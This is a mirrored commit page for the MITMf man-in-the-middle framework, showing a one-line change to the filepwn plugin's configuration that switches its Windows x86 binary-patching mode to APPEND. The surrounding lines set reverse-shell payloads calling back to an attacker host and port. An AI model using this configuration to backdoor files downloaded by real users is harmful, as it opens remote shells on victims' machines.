mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-16 10:03:52 -07:00
changed default patch_type to append for filepwn plugin
This commit is contained in:
parent
10f1fbedde
commit
39e44d0e6e
1 changed files with 1 additions and 1 deletions
|
@ -321,7 +321,7 @@
|
||||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||||
|
|
||||||
[[[[WindowsIntelx86]]]]
|
[[[[WindowsIntelx86]]]]
|
||||||
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
|
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||||
HOST = 192.168.1.16
|
HOST = 192.168.1.16
|
||||||
PORT = 8443
|
PORT = 8443
|
||||||
SHELL = reverse_tcp_stager
|
SHELL = reverse_tcp_stager
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue